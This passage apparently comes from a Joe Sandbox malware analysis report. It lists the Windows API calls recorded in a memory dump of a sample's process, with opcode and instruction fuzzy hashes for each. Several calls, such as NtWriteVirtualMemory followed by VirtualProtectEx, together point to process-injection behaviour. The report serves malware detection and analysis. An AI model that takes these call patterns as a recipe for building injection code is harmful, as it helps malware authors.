                          • VirtualProtect.KERNELBASE ref: 007F1C7C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                          • Instruction ID: bcccec8ebf3a1846b288b71d040015f5d8923ec64d144200dc98cd347bd8da20
                          • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                          • Instruction Fuzzy Hash: 8E517D70618F098FD748EF29D889725B7E4FB98311F50056EE94AC3361EB38E941CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          APIs
                          • StrRChrA.KERNELBASE ref: 007FBC73
                          • RtlAddVectoredContinueHandler.NTDLL ref: 007FBD67
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ContinueHandlerVectored
                          • String ID:
                          • API String ID: 3758255415-0
                          • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                          • Instruction ID: 91d9a939d3650cde6c733805d323e26a667fc54afb21114cbc24c0605643f2a1
                          • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                          • Instruction Fuzzy Hash: BE41B230608A498FEB65EF38D88867A77E1FB98305B65452E954AC3365DF7CC802CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00808F1E,?,?,?,?,?,?,0000007E,007FF548), ref: 00808A6C
                          • RegCloseKey.KERNELBASE ref: 00808AEF
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CloseOpen
                          • String ID:
                          • API String ID: 47109696-0
                          • Opcode ID: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                          • Instruction ID: 88b3d5e15b00518886a1ff427b7cc3cf861cb3e658763451a6c209e5c048a1c8
                          • Opcode Fuzzy Hash: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                          • Instruction Fuzzy Hash: 6D314130618B0C8FD794EF68D894A6A77E1FBA8310B054A7EE44EC3251DF34D945CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00801105), ref: 008186B6
                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00801105), ref: 00818723
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                          • Instruction ID: 67d26fe58bb78ee08e0e63e6d7cc912671b2dda44162be372a1c6d8578fb1d6b
                          • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                          • Instruction Fuzzy Hash: 70215130618B088FD758EF28E849666B7E1FB98351F20486EE44EC3661DF34E981CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegCreateKeyA.ADVAPI32(?,?,?,00819153), ref: 00817027
                          • RegOpenKeyA.ADVAPI32(?,?,?,00819153), ref: 00817034
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateOpen
                          • String ID:
                          • API String ID: 436179556-0
                          • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                          • Instruction ID: 6d0d612ec8a39a91945c2b859118abfe2d398e43a80951ee7bd769482a94cd7e
                          • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                          • Instruction Fuzzy Hash: 49016130618B088FDB44DB5C9488669B7F5FBAC351F11446DE98AC3261DAB4C9858B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateQueueThreadUser
                          • String ID:
                          • API String ID: 3600083758-0
                          • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                          • Instruction ID: 40bbb1b38753bb37160389f21a299aeaa568acd8f30652799daebe9c7490be60
                          • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                          • Instruction Fuzzy Hash: FA014030754A094FEB54EFADA85D629B7E2EB98311B04456AA409C3264DF78DC41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                          • Instruction ID: c83cd96a985393256638ee338a357489f136958dcbf60453ec3f51e13c76855a
                          • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                          • Instruction Fuzzy Hash: 44616570618E09DFD754EF18D489AA6B3E4FFA8311F50552EE84AC3261DB34E881CBC2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 0080B5F6
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: BoundaryDeleteDescriptor
                          • String ID:
                          • API String ID: 3203483114-0
                          • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                          • Instruction ID: a35d8d9b01656b036d3f1fc6098d7280ff31cf49c4bc23fbd0e5ae01581b72f4
                          • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                          • Instruction Fuzzy Hash: 0941F530658E1C8FDB98EF6CEC859A673E1F769310B50416DE00AC72A1DB78EC85CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                          • Instruction ID: edecbc483e4e3e5a4e78296c4588801ede3f1bf86801957fe336874b1639ac28
                          • Opcode Fuzzy Hash: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                          • Instruction Fuzzy Hash: 183164303146488BEB98EF7CECD55AB73E6FB98300744D529A547C3692DF38D9468B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindCloseChangeNotification.KERNELBASE ref: 007F4A08
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                          • Instruction ID: 4c85629f6293a23fb6d7d749038ca6bd6557bda43f6bb948f126895e42dec54e
                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                          • Instruction Fuzzy Hash: 19215931208B498FEB95EF2CD888A6B77E4FBA8301B11452DE60AC3260DB78D9448B41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                          • Instruction ID: 50341c8bf210fc889815468630cec5d8aa995982d37dfc57338738e9f804974b
                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                          • Instruction Fuzzy Hash: 9111513160CB098FAB14EF59E445469B7E9FB9C311B40463EEC8AC3345EE70E9458B86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 007F6D24: NtWriteVirtualMemory.NTDLL ref: 007F6D43
                          • VirtualProtectEx.KERNELBASE ref: 007F4A9C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Virtual$MemoryProtectWrite
                          • String ID:
                          • API String ID: 1789425917-0
                          • Opcode ID: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                          • Instruction ID: 288c02b5ee3f0880fefcb5c3905c0fafb287193d5882b8f1308602e54be4dcd9
                          • Opcode Fuzzy Hash: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                          • Instruction Fuzzy Hash: EC015A70A18B088FCB48EF58E0C9525B7E0EB98311B4045AEE90DC7256CB70D945CB86
                          Uniqueness

                          Uniqueness Score: -1.00%